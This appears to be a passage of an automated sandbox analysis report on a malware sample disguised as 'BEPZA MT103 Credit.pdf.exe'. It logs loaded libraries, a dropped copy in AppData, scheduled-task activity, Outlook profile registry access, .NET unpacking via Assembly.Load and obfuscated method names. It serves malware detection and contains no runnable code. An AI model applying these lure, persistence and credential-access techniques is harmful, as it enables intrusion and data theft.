Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: BEPZA MT103 Credit.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: BEPZA MT103 Credit.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs	.Net Code: xPrfnvSRvd System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs	.Net Code: xPrfnvSRvd System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_077B6640 pushfd ; retf	0_2_077B6649
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_077B58F3 push eax; ret	0_2_077B5979
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C55F48 pushfd ; iretd	0_2_07C55F51
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07486640 pushfd ; retf	11_2_07486649
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07485970 pushad ; ret	11_2_07485971
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07485973 push eax; ret	11_2_07485979
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07885F48 pushfd ; iretd	11_2_07885F51
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_0126B3A8 push eax; iretd	16_2_0126B445
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_0126BB37 push es; iretd	16_2_0126BB44
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_06C09470 push es; ret	16_2_06C09480

Source: BEPZA MT103 Credit.pdf.exe	Static PE information: section name: .text entropy: 7.64808870100143
Source: YEGIgzyAhkvT.exe.0.dr	Static PE information: section name: .text entropy: 7.64808870100143

Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, P3eh8af2o4VTkSD0Y3.cs	High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, ihTFxFFnSRQetgx2gS.cs	High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, q3XwxeHE3wtcqHlLbH.cs	High entropy of concatenated method names: 'yTNvJijCfC', 'mhrv66gQaH', 'JjVvOpxu3J', 'WyKOB37wpy', 'ddCOzg2VyU', 'DxtvFsMdiT', 'rmLvC3uWnw', 'CTpvWRmZRq', 'jLuvo52fvs', 'JwevfhP6U8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, BhwjN4CoqiKd9WhjTAN.cs	High entropy of concatenated method names: 'DbO9BqXZYX', 'J489zSNl7A', 'Ox27F4gwdL', 'px15LjeTD02oYoVfDHQ', 'pSsZE1eRb5JcUsFxFgj', 'ED1c9ke0bw0v1fiWbvS', 'Cw12FQeFgvtc5WkqQGv', 'WYmPJeeWNvMWUGUA4Z4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, paZWfdzUnnsDNcXHe9.cs	High entropy of concatenated method names: 'JrBRblIdAT', 'IkpRifCAnd', 'p1CRTYrbZ5', 'k3ZRlqpQ2a', 'jUgR25OLXe', 'gRERujaIjl', 'cMhRKL8RIf', 'e1ER3a12lH', 'a8qRkp8htH', 'aBgRgPbiaN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, dkTFxqCCeLQYu7pD8nM.cs	High entropy of concatenated method names: 'MSSRB2HDmx', 'yW2RzvPO6U', 'SoN9FLpfEM', 'pVe9CU70th', 'mAH9WTETjD', 'qMZ9oHDcqV', 'lkN9fTjLG6', 'xPo9hr1jLE', 'a7u9JIJhNt', 'DqN9E5Wj0B'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, WCNuVMYuSEVTHy8bH7.cs	High entropy of concatenated method names: 'wq0QiWW9by', 'mu3QToD1Bk', 'egSQlNTIM0', 'bSMQ2FKEfc', 'u1kQuY4BqT', 'E8jQKgpmML', 'FJtQHJPFsH', 'lkWQPp98aa', 'IdqQZX41ka', 'XAPQmp9rVj'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, h7nrZ0E3lRQtVg8uOM.cs	High entropy of concatenated method names: 'Dispose', 'j7vCXF81q9', 'rpJW2MIubb', 's0FLGbgUxt', 'vmwCBGrP0W', 'UomCzQhi4Y', 'ProcessDialogKey', 'PYxWFPcggf', 'WrRWCGHwfd', 'qKrWW7E5Ra'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs	High entropy of concatenated method names: 'e27E1eAgA8', 'qhrEVcd788', 'VD5EMBYofs', 'qgiEG8fE5p', 'M9vEq7u4G6', 'UVJErOPuuE', 'G2KEweVy0s', 'EsWEaNB1k0', 'WG8EXWncnN', 'lnUEBuijKF'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, y6b8FRlSR6PSYKhFPw.cs	High entropy of concatenated method names: 'TTAOh5xyRC', 'y55OEf2CUc', 'jAIONMt0Ol', 'eDOOv9970V', 'fuDOSLDTqm', 'rOTNqdJhdf', 'PgsNrsFTgj', 'BLQNwKYdZC', 'C0XNaJpXr1', 'B50NX9joOC'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, QPUYnACfL7r4DkBL9YF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LJi7D0ag73', 'jHx7R0PWuW', 'DZw79H6mLg', 'ftv77bogHm', 'ipM7pi1frx', 'jo17xemSM6', 'Y5Z73XARF8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, nUBjUWrYcwnrjp5cwr.cs	High entropy of concatenated method names: 'CmW5afqsQR', 'MB25B19K1t', 'BOEcFvnC3u', 'sabcCQ1UGY', 'RW15mopqJ7', 'q8y5eaP7CH', 'va95YjUDjX', 'k5O515dbPc', 'U8Q5VtT6QN', 'lTC5MplWM4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, gPDJgDfUH82JajhHPO.cs	High entropy of concatenated method names: 'fA8CvTHTbN', 'sjeCSUoU6V', 'pYbCLK74xT', 'G5pCtAtjcV', 'Ik4Cs9fg6b', 'kFRCjSR6PS', 'MQMhYmTMfh56qVbmhF', 'ebhyLTRtnZwbXUyRDG', 'h5rCCspKTv', 'QUVCoD4KZ1'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, wPcggfXarRGHwfdcKr.cs	High entropy of concatenated method names: 'cNGDldGHbn', 'kG5D2BIY8n', 'DXjD41oP6X', 'zqnDuV3GY2', 'MPkDKqUnuC', 'TyGD0JO2uo', 'iFqDHbuvcZ', 'JbgDPdJuDx', 'VpQDANrMdk', 'dBQDZhwIIf'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, cLTVWI0Z4SQaHe7mK7.cs	High entropy of concatenated method names: 'o49OMsP0W6', 'q2wOG0bYG7', 'qUCOqKeDlE', 'ToString', 'SpMOreWjqu', 'vPFOwyaXa3', 'WAEphH3rae6gGSOtqaq', 'sfwHZk3Yl4o8sAEugW8', 'X5pQ3X3cR1Csdm462iN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs	High entropy of concatenated method names: 'vh7ohprC21', 'pyFoJSOpYV', 'AvYoEsRkwS', 'oLLo6KDV3Q', 'QWaoNxmVPu', 'DEkoOR9Xfn', 'r4TovSu3G4', 'g3NoSq1aMH', 'OLyo8I7W8q', 'NBXoLbHp5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, HTZDqbGRORNdQopHe8.cs	High entropy of concatenated method names: 'Dn55L5qPHc', 'm555t4vfsX', 'ToString', 'oFQ5JLygv7', 'krw5ENsvuB', 'FM456XlECL', 'gtj5NbcDrg', 'OqK5OGdnWV', 'dk65vrp1oW', 'qfw5STs9R3'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, hceRmTCWrN6wH7cI3N6.cs	High entropy of concatenated method names: 'ToString', 'VNk9i7mtQg', 'cXG9T7AC7p', 'mXS9UBXGZR', 'WKj9lNBOkb', 'vFw92UhgK3', 'G4m94VCPT4', 'AJy9uHxK8G', 'Ymfkere5gwDXkBE2UpZ', 'DrMvCEe15sFUN7tVkfH'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, s8Y1y0Mi9WcOG0mTH1.cs	High entropy of concatenated method names: 'ToString', 'Hn8jmmFnHG', 'fjGj2VT9lN', 'osFj459dNP', 'mu1juJe4fi', 'QtQjKRSaO2', 'Ycxj0Wn1nA', 'mwrjHLZEi2', 'J7VjP7bjQ4', 'gACjArprPG'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, uE5RalB2ln8b0n8Wbv.cs	High entropy of concatenated method names: 'MxOR6h7bi6', 'dAmRNVqlVu', 'uhZROKdbCF', 'UdSRvBB3ch', 'W3sRD83s60', 'iGJRSHAoGN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, cvRFX3AvwS2op08hje.cs	High entropy of concatenated method names: 'tExvkeX4kZ', 'sCavg8G8oI', 'Ge3vn7OYYn', 'OARvdB0bD6', 'STSvId92KY', 'Jtcvba3Iq9', 'OYwvyjm3pp', 'X2xviv4PkG', 'hWNvT8Z7nW', 'XLMvUodxbo'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, OFmwd81ndwdfW0m9Y4.cs	High entropy of concatenated method names: 'BFtsZ5kkLc', 'L5gsed5Su4', 'fAhs1iuaPx', 'tlqsVHx8t0', 'JVes2CW44d', 'O40s45t9m7', 'iEKsumsGYg', 'oGesKci1to', 'm0ds0f0VSZ', 'DgTsHaHAFp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, mjcVcEUwoMYpYuk49f.cs	High entropy of concatenated method names: 'ct9NINHm7p', 'Lj0NyHDt9p', 'mT664i5LPb', 'IOP6uD7Twi', 'brA6KY2hQA', 'cdZ60weyNy', 'W5f6HvEhsk', 'yS26PWDrYQ', 'YdC6AOFA6d', 'YgF6Z0ed5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, Cw8mvfWKUJllqoD5N5.cs	High entropy of concatenated method names: 'pYlnu46qq', 'EsbdMnlnl', 'kTmbicCx9', 'pGRyinob4', 'j4rTutCpv', 'l9bUDr4fm', 'mXMnlXDRHw2OHarK6k', 'DIit5t8Ry6hgFT2umZ', 'CJGclZ3S3', 'EiiR6Ylyy'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, IeGoKjTYbK74xTl5pA.cs	High entropy of concatenated method names: 'wAn6dKQqj3', 'Huy6bk8Tv3', 'Im66i5AqpJ', 'RF86TnSoHd', 'whX6sDrdHP', 'fky6jSx93A', 'hQj654qH0t', 't0U6c0oDLL', 'QLC6DPS3jP', 'AX76RI3VLp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, I7NNcAw8mv7vF81q9x.cs	High entropy of concatenated method names: 'lM7Dsw39Xm', 'dvRD5BfwRv', 'EpSDDc2Ofg', 'BVfD93DDvX', 'PsKDpIFPx2', 'AZhD3cupQX', 'Dispose', 'dvjcJTnDwE', 'njQcEJ6s5H', 'Emcc6AG6s4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, q3XwxeHE3wtcqHlLbH.cs	High entropy of concatenated method names: 'yTNvJijCfC', 'mhrv66gQaH', 'JjVvOpxu3J', 'WyKOB37wpy', 'ddCOzg2VyU', 'DxtvFsMdiT', 'rmLvC3uWnw', 'CTpvWRmZRq', 'jLuvo52fvs', 'JwevfhP6U8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, BhwjN4CoqiKd9WhjTAN.cs	High entropy of concatenated method names: 'DbO9BqXZYX', 'J489zSNl7A', 'Ox27F4gwdL', 'px15LjeTD02oYoVfDHQ', 'pSsZE1eRb5JcUsFxFgj', 'ED1c9ke0bw0v1fiWbvS', 'Cw12FQeFgvtc5WkqQGv', 'WYmPJeeWNvMWUGUA4Z4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, paZWfdzUnnsDNcXHe9.cs	High entropy of concatenated method names: 'JrBRblIdAT', 'IkpRifCAnd', 'p1CRTYrbZ5', 'k3ZRlqpQ2a', 'jUgR25OLXe', 'gRERujaIjl', 'cMhRKL8RIf', 'e1ER3a12lH', 'a8qRkp8htH', 'aBgRgPbiaN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, dkTFxqCCeLQYu7pD8nM.cs	High entropy of concatenated method names: 'MSSRB2HDmx', 'yW2RzvPO6U', 'SoN9FLpfEM', 'pVe9CU70th', 'mAH9WTETjD', 'qMZ9oHDcqV', 'lkN9fTjLG6', 'xPo9hr1jLE', 'a7u9JIJhNt', 'DqN9E5Wj0B'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, WCNuVMYuSEVTHy8bH7.cs	High entropy of concatenated method names: 'wq0QiWW9by', 'mu3QToD1Bk', 'egSQlNTIM0', 'bSMQ2FKEfc', 'u1kQuY4BqT', 'E8jQKgpmML', 'FJtQHJPFsH', 'lkWQPp98aa', 'IdqQZX41ka', 'XAPQmp9rVj'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, h7nrZ0E3lRQtVg8uOM.cs	High entropy of concatenated method names: 'Dispose', 'j7vCXF81q9', 'rpJW2MIubb', 's0FLGbgUxt', 'vmwCBGrP0W', 'UomCzQhi4Y', 'ProcessDialogKey', 'PYxWFPcggf', 'WrRWCGHwfd', 'qKrWW7E5Ra'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs	High entropy of concatenated method names: 'e27E1eAgA8', 'qhrEVcd788', 'VD5EMBYofs', 'qgiEG8fE5p', 'M9vEq7u4G6', 'UVJErOPuuE', 'G2KEweVy0s', 'EsWEaNB1k0', 'WG8EXWncnN', 'lnUEBuijKF'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, y6b8FRlSR6PSYKhFPw.cs	High entropy of concatenated method names: 'TTAOh5xyRC', 'y55OEf2CUc', 'jAIONMt0Ol', 'eDOOv9970V', 'fuDOSLDTqm', 'rOTNqdJhdf', 'PgsNrsFTgj', 'BLQNwKYdZC', 'C0XNaJpXr1', 'B50NX9joOC'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, QPUYnACfL7r4DkBL9YF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LJi7D0ag73', 'jHx7R0PWuW', 'DZw79H6mLg', 'ftv77bogHm', 'ipM7pi1frx', 'jo17xemSM6', 'Y5Z73XARF8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, nUBjUWrYcwnrjp5cwr.cs	High entropy of concatenated method names: 'CmW5afqsQR', 'MB25B19K1t', 'BOEcFvnC3u', 'sabcCQ1UGY', 'RW15mopqJ7', 'q8y5eaP7CH', 'va95YjUDjX', 'k5O515dbPc', 'U8Q5VtT6QN', 'lTC5MplWM4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, gPDJgDfUH82JajhHPO.cs	High entropy of concatenated method names: 'fA8CvTHTbN', 'sjeCSUoU6V', 'pYbCLK74xT', 'G5pCtAtjcV', 'Ik4Cs9fg6b', 'kFRCjSR6PS', 'MQMhYmTMfh56qVbmhF', 'ebhyLTRtnZwbXUyRDG', 'h5rCCspKTv', 'QUVCoD4KZ1'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, wPcggfXarRGHwfdcKr.cs	High entropy of concatenated method names: 'cNGDldGHbn', 'kG5D2BIY8n', 'DXjD41oP6X', 'zqnDuV3GY2', 'MPkDKqUnuC', 'TyGD0JO2uo', 'iFqDHbuvcZ', 'JbgDPdJuDx', 'VpQDANrMdk', 'dBQDZhwIIf'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, cLTVWI0Z4SQaHe7mK7.cs	High entropy of concatenated method names: 'o49OMsP0W6', 'q2wOG0bYG7', 'qUCOqKeDlE', 'ToString', 'SpMOreWjqu', 'vPFOwyaXa3', 'WAEphH3rae6gGSOtqaq', 'sfwHZk3Yl4o8sAEugW8', 'X5pQ3X3cR1Csdm462iN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs	High entropy of concatenated method names: 'vh7ohprC21', 'pyFoJSOpYV', 'AvYoEsRkwS', 'oLLo6KDV3Q', 'QWaoNxmVPu', 'DEkoOR9Xfn', 'r4TovSu3G4', 'g3NoSq1aMH', 'OLyo8I7W8q', 'NBXoLbHp5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, HTZDqbGRORNdQopHe8.cs	High entropy of concatenated method names: 'Dn55L5qPHc', 'm555t4vfsX', 'ToString', 'oFQ5JLygv7', 'krw5ENsvuB', 'FM456XlECL', 'gtj5NbcDrg', 'OqK5OGdnWV', 'dk65vrp1oW', 'qfw5STs9R3'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, hceRmTCWrN6wH7cI3N6.cs	High entropy of concatenated method names: 'ToString', 'VNk9i7mtQg', 'cXG9T7AC7p', 'mXS9UBXGZR', 'WKj9lNBOkb', 'vFw92UhgK3', 'G4m94VCPT4', 'AJy9uHxK8G', 'Ymfkere5gwDXkBE2UpZ', 'DrMvCEe15sFUN7tVkfH'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, s8Y1y0Mi9WcOG0mTH1.cs	High entropy of concatenated method names: 'ToString', 'Hn8jmmFnHG', 'fjGj2VT9lN', 'osFj459dNP', 'mu1juJe4fi', 'QtQjKRSaO2', 'Ycxj0Wn1nA', 'mwrjHLZEi2', 'J7VjP7bjQ4', 'gACjArprPG'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, uE5RalB2ln8b0n8Wbv.cs	High entropy of concatenated method names: 'MxOR6h7bi6', 'dAmRNVqlVu', 'uhZROKdbCF', 'UdSRvBB3ch', 'W3sRD83s60', 'iGJRSHAoGN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, cvRFX3AvwS2op08hje.cs	High entropy of concatenated method names: 'tExvkeX4kZ', 'sCavg8G8oI', 'Ge3vn7OYYn', 'OARvdB0bD6', 'STSvId92KY', 'Jtcvba3Iq9', 'OYwvyjm3pp', 'X2xviv4PkG', 'hWNvT8Z7nW', 'XLMvUodxbo'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, OFmwd81ndwdfW0m9Y4.cs	High entropy of concatenated method names: 'BFtsZ5kkLc', 'L5gsed5Su4', 'fAhs1iuaPx', 'tlqsVHx8t0', 'JVes2CW44d', 'O40s45t9m7', 'iEKsumsGYg', 'oGesKci1to', 'm0ds0f0VSZ', 'DgTsHaHAFp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, mjcVcEUwoMYpYuk49f.cs	High entropy of concatenated method names: 'ct9NINHm7p', 'Lj0NyHDt9p', 'mT664i5LPb', 'IOP6uD7Twi', 'brA6KY2hQA', 'cdZ60weyNy', 'W5f6HvEhsk', 'yS26PWDrYQ', 'YdC6AOFA6d', 'YgF6Z0ed5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, Cw8mvfWKUJllqoD5N5.cs	High entropy of concatenated method names: 'pYlnu46qq', 'EsbdMnlnl', 'kTmbicCx9', 'pGRyinob4', 'j4rTutCpv', 'l9bUDr4fm', 'mXMnlXDRHw2OHarK6k', 'DIit5t8Ry6hgFT2umZ', 'CJGclZ3S3', 'EiiR6Ylyy'
